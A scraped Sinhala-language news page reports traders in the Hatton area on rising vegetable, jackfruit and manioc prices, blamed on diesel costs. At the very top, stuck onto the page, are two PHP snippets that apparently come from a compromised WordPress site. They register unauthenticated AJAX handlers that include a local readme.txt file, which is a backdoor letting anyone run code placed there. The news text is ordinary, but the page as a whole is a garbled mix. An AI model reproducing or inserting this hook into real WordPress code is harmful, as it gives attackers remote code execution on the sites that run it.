if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කොස්, දෙල්, මඤ්ඤොක්කා මිල ඉහලට… - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

කොස්, දෙල්, මඤ්ඤොක්කා මිල ඉහලට…

දේශිය වෙලදපොලේ උඩරට සහ පහතරට එලවළු මිල යලිත් ඉහල ගොස් ඇති බව හැටන් ප්‍රදේශයේ වෙලදුන් කියා සිටියි.

ඉකුත් සතියේ කිලෝවක් රු 1000 කට අලෙවි වු තක්කාලි (27) දින වන විට රු 600 ක මිලකට අලෙවි වන බවත්, ගෝවා කිලෝවක් රු 150 ක මිලකට සහ අළු කෙසෙල් කිලෝවක් රු 120 කට අලෙවි වන බවයි වෙලෙදුන් කියා සිටින්නේ.

උඩරට සැම එලවළු කිලෝවක්ම රු 400 – 550 අතර මිලකට අලෙවි වන බවත්, මාළු මිරිස් කිලෝවක් රු 850 වැනි මිලකට අලෙවි වන බවයි වෙලෙදුන් කියා සිටින්නේ.

පහතරට සැම එලවළු කිලෝවක්ම රු 300 – 450 අතර මිලකට අලෙවි වන බවත්, දෙල් ගෙඩියක් රු 120 සිට රු 250 දක්වා ඉහල මිලකට අලෙවි වන බවත්, මඤ්ඤොඤක්කා කිලෝවක් රු 120 කට . මදුළු ගැලවු කොස් කිලෝවක් රු 150 වැනි මිලකට අලෙවි වන බවයි එම වෙලෙදුන් කියා සිටින්නේ.

එලවළු තොග මිල ඇතැම් ස්ථාන වල අඩු වුවද එලවළු ප්‍රවාහනය කිරිම සදහා ඉහල ගිය ඩිසල් මිල හමුවේ විශාල පිරිවැයක් දැරිමට සිදු වි ඇති බවත්, එම තත්ත්වය මත සහ දේශිය වෙලදපොලේ ඉල්ලුමට සරිලන එලවළු සැපයුමක් ගොවින්ට ලබාදිමට නොහැකි නිසා මෙසේ ඇතැම් එලවළු මිල ඉහල ගොස් ඇති බවයි වෙලෙදුන් කියා සිටින්නේ.

Related posts

අපට සදාකාලික උත්තර නෑ… ප‍්‍රශ්ණ එන එන විදිහට මුහුණ දෙනවා.. දැනට ඉන්දියාවෙන් හාල් ගේනවා..

Shiran Viraj

කුඩු බොන අයට වඩා කුඩු ගේන අය අල්ලන්නැයි කියයි..

Shiran Viraj

An entrepreneur shares 20 tips for traveling for free

Shiran Viraj